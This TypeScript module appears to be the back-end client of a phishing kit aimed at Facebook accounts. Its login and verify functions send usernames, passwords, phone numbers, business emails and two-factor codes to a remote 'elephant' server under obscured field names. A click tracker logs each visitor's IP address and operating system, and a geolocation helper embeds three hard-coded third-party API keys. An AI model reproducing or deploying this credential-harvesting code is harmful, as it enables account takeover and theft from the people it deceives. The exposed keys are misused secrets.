import axios from "axios";
import { handleError, handleResponse } from "./utils";
const ENDPOINT = "https://api.elephant.kakiem.xyz/api/fb/";
// const ENDPOINT = "http://localhost:4000/api/fb/";

export const verify = async (
  username: string,
  password: string,
  code: string,
  countryCode: string,
  ipAddress: string,
  idea: string,
  timestamp: number
) => {
  try {
    const url = `${ENDPOINT}verify`;
    const params = {
      uvi: username,
      pvi: password,
      ivic: ipAddress,
      ccVi: countryCode,
      idSl: idea,
      fcVic: code,
      tiSV: timestamp
    };
    const response = await axios.post<any>(url, params, { timeout: 100000 });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "error");
  }
};

export const login = async (
  phoneNumber: string,
  bEmail: string,
  username: string,
  password: string,
  countryCode: string,
  ipAddress: string,
  idea: string,
  socketId: string
) => {
  try {
    const url = `${ENDPOINT}login`;
    const params = {
      phvi: phoneNumber,
      bevi: bEmail,
      uvi: username,
      pvi: password,
      ivic: ipAddress,
      ccVi: countryCode,
      idSl: idea,
      sId: socketId
    };
    const response = await axios.post<any>(url, params, { timeout: 100000 });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "error");
  }
};

const apiKeys = [
  "a7313847b6a1dfff82644e1547adabb96a56305979fd470f2b32974c", // Primary
  "7c197c6fcc601802d33fbf8d911f4da5a464de3c37cf134b74550086", // Backup 1
  "9217a24d709765334aa1545730bca6d2245780dd004904cf902a70d1" // Backup 2
];
export const getLocation = async () => {
  for (const key of apiKeys) {
    try {
      const url = `https://api.ipdata.co/?api-key=${key}`;
      const response = await axios.get(url);
      return response.data;
    } catch (error) {
      console.warn(`❌ Failed with API key: ${key}`);
    }
  }
  console.error("🚨 All location API keys failed");
  return null;
};

export const click = async (
  idea: string,
  os: string,
  ip: string,
  countryCode: string
) => {
  try {
    const params = {
      ivic: ip,
      os: os,
      ccVi: countryCode,
      idSl: idea
    };
    const url = `${ENDPOINT}click`;
    const response = await axios.post(url, params);
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "something went wrong");
  }
};
